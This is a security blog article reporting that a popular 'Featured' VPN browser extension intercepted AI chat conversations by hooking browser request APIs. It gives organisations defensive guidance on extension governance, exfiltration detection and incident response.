A featured browser extension allegedly intercepted millions of AI chats. Learn how it worked—and how AI-driven cybersecurity can detect and stop exfiltration.

Featured Extensions Can Steal Your AI Chats—Stop It
A “Featured” browser extension with 6 million users was caught intercepting conversations from popular AI chat tools—capturing both prompts and responses—and sending them to remote analytics endpoints. That number matters because “AI chat” isn’t a novelty anymore. For many teams, it’s where drafts, incident notes, customer data snippets, code, internal strategy, and legal language get workshopped.
Most companies still treat AI chat usage like a personal productivity habit. The reality is it’s a new data plane—and browser extensions sit directly on top of it. This incident is a clean case study for the “AI in Cybersecurity” series: the threat isn’t just prompt injection or model misuse. It’s the everyday tooling around AI that can siphon sensitive content at scale.
What follows is the practical breakdown: what happened, why “Featured” badges didn’t protect users, the technical mechanism that made this possible, and how AI-driven cybersecurity can detect (and often prevent) this class of browser-based data exfiltration.
What happened: a “Featured” extension intercepted AI chats
Answer first: A popular VPN extension update enabled AI conversation harvesting by default, collecting prompts, responses, identifiers, and session metadata from multiple chatbot sites.
Security researchers reported that a Chrome extension marketed as a free VPN—Urban VPN Proxy—silently gathered AI conversations across major platforms including ChatGPT, Claude, Copilot, Gemini, Grok, Meta AI, DeepSeek, and Perplexity. The extension carried a “Featured” badge and a 4.7 rating, which is exactly why this story stings: users took marketplace signals as a proxy for safety.
According to the report, the problematic functionality shipped in version 5.5.0 on July 9, 2025, enabled by default via hard-coded settings. Users didn’t “opt in” to chat capture. They likely didn’t notice anything at all—because extensions auto-update quietly.
The captured data set is especially valuable to attackers and data brokers because it’s high-context and human-written:
- User prompts
- Chatbot responses
- Conversation IDs and timestamps
- Session metadata
- AI platform and model used
Even if you strip obvious identifiers, AI chats often contain names, systems, codebase details, client context, and internal decisions. “De-identified” doesn’t mean “safe.” It often means “harder to prove.”
How browser extensions can read (and reroute) AI conversations
Answer first: Extensions can inject scripts into specific sites and intercept network calls by overriding browser request APIs like fetch() and XMLHttpRequest().
Here’s the mechanism described in the research: the extension used tailored JavaScript files (for example, scripts mapped to specific AI platforms) that ran when users visited targeted chatbot domains. Once loaded, the injected code hooked the same APIs the web app uses to send and receive messages.
The core trick: hooking fetch() and XMLHttpRequest()
Modern web apps—AI chats included—rely heavily on fetch() and XMLHttpRequest() to send prompts and receive streamed responses. If an extension injects code that overrides those functions, it can:
- See outgoing requests (your prompt)
- See incoming responses (the model’s reply)
- Capture headers/body/metadata
- Forward the data to its own servers
In the reported case, the data was exfiltrated to two remote endpoints used for “analytics” and “stats.” Functionally, the naming doesn’t matter. If a VPN extension is exporting AI conversations, that’s not telemetry—it’s content theft.
Why this is so hard for users to notice
This kind of interception doesn’t need keylogging popups or visible redirects. Done carefully, it adds minimal latency and no obvious UI change. Users keep chatting. The extension keeps copying.
This is why browser extension risk isn’t a niche security concern anymore. AI chat made the browser a primary workspace again—and extensions are effectively mini-apps with privileged access.
The bigger issue: trust signals in extension stores don’t equal safety
Answer first: Store ratings and “Featured” badges are user-experience signals, not ongoing security guarantees—especially after auto-updates.
Many teams assume the extension marketplace acts like a security gate. In practice, it’s closer to an app store with policy enforcement that can lag behind adversaries. A “Featured” badge can indicate the extension met certain quality guidelines at a point in time. It does not guarantee:
- The next update won’t add invasive collection
- The developer’s business model won’t shift
- The codebase won’t incorporate third-party SDKs designed for data harvesting
- The telemetry won’t expand from “performance” to “content”
This incident also highlights a painful truth: auto-update is a supply chain feature. It’s convenient for patching, but it’s also an ideal delivery mechanism for unwanted functionality.
“AI protection” features can be a smokescreen
One reported detail is particularly cynical: the extension advertised an “AI protection” capability—warnings about sensitive data in prompts—while the underlying collection ran regardless of whether that feature was enabled.
That pattern is becoming common:
- A user-facing safety feature that builds trust
- A background data pipeline that monetizes the exact content the UI claims to protect
If your organization is leaning on user education alone (“don’t paste secrets”), this is the part that should change your mind. Users can do everything “right” and still get burned by the tooling layer.
Where AI-driven cybersecurity fits: detecting exfiltration at scale
Answer first: AI security tools can flag anomalous browser traffic, suspicious extension behavior, and unusual data flows that humans won’t catch—especially across thousands of endpoints.
This story isn’t just about one extension. It’s about how browser-based data exfiltration scales faster than manual review. If you’re responsible for security operations, you need detection that’s both broad and precise.
Here’s what I’ve found works in practice: treat AI chat traffic as sensitive and apply the same anomaly detection mindset you’d apply to finance systems or source control.
1) Network anomaly analysis for AI chat endpoints
Well-tuned anomaly detection can catch patterns like:
- AI chat traffic being duplicated to unrelated “analytics” domains
- New domains appearing shortly after an extension update
- Unusual request frequency or payload size growth during chat sessions
- TLS connections from browsers to low-reputation endpoints that correlate with AI usage
The detection value comes from correlation. A single call to an analytics host might be normal. The same call occurring immediately after every AI prompt submission is not.
2) Behavioral analytics for extension activity
Extensions are tricky because they run inside user browsers, and their permissions can be broad. AI-powered security monitoring can help by building baselines and flagging deviations:
- New script injection behaviors on specific domains
- Newly observed API hooking patterns (like wrapping
fetch()) - Content script changes that correlate with user input fields on AI sites
- Extensions that begin touching more domains than their stated purpose
You’re not looking for “malware signatures” alone. You’re looking for intent: “Why is a VPN extension touching ChatGPT network calls?”
3) Automated security operations: faster containment
If your detection pipeline is strong but your response is slow, you still lose. The practical workflow looks like:
- Alert: AI chat traffic mirrored to suspicious domain
- Triage: confirm extension correlation (device + extension ID + time)
- Contain: auto-quarantine extension via endpoint policy
- Remediate: invalidate sessions, rotate credentials, review exposed content risk
This is where AI in cybersecurity earns its keep: reducing the time from “weird signal” to “fleet-wide action.”
What to do now: a pragmatic checklist for teams
Answer first: Restrict extensions, isolate AI usage, monitor egress, and assume chats contain sensitive data—even when users try not to.
If you’re running security for an organization where employees use AI chat tools, here’s a concrete plan you can implement without boiling the ocean.
Extension governance (non-negotiable)
- Block all extensions by default on managed browsers; allowlist only what’s needed.
- Require publisher verification and internal review for any extension requesting broad permissions.
- Turn on extension update monitoring (alert when a new version ships to your fleet).
- Remove “nice to have” tools like free VPNs, coupon finders, and unknown ad blockers from corporate environments.
If your team pushes back with “but it has millions of users,” treat that as a risk indicator, not a comfort blanket. Popularity attracts monetization pressure.
Protect AI chat usage like a data channel
- Segment AI usage through managed browsers or VDI for high-risk teams (finance, legal, engineering).
- Apply DLP controls for copy/paste and form submissions where feasible.
- Use enterprise AI gateways or proxies if your environment supports it, to enforce policy and log safely.
Monitoring and detection
- Create a dedicated detection rule set for AI chat exfiltration: mirrored requests, new domains, payload anomalies.
- Log DNS + egress from browsers, and retain enough history to investigate “what changed last week?”
- Run periodic hunts: “Which endpoints contacted analytics-style hosts immediately after AI chat activity?”
Incident response: assume exposure is contextual
If you discover an extension like this was installed:
- Identify which AI platforms were used and by whom
- Review whether chats likely included credentials, customer data, proprietary code, or regulated data
- Rotate secrets that may have been pasted (API keys, tokens, passwords)
- Brief legal/compliance early if regulated data may have been involved
The hard part is scoping, not uninstalling.
People also ask: quick answers you can reuse internally
Can a browser extension read my ChatGPT or Claude conversations?
Yes. If it injects scripts into those sites or intercepts network calls, it can capture prompts and responses.
Does a “Featured” badge mean an extension is safe?
No. It’s not an ongoing security guarantee, and auto-updates can change behavior overnight.
What’s the fastest way to reduce extension risk in a company?
Managed browser policies: block-by-default, strict allowlists, and alerting on extension updates.
Where this fits in the “AI in Cybersecurity” story
AI is becoming a default interface for work. That shifts the security perimeter again—back into the browser—where extensions can act like silent middlemen. I don’t think “teach users to be careful with prompts” is an adequate strategy anymore. It’s necessary, but it’s not sufficient.
The better approach is measurable: detect anomalous data flows, constrain third-party tooling, and automate response when the browser starts exporting sensitive AI chat content.
If your organization can’t currently answer “Which extensions can access our AI tools, and where can they send data?” that’s the next project to prioritize. What would it take to get that answer by the end of January?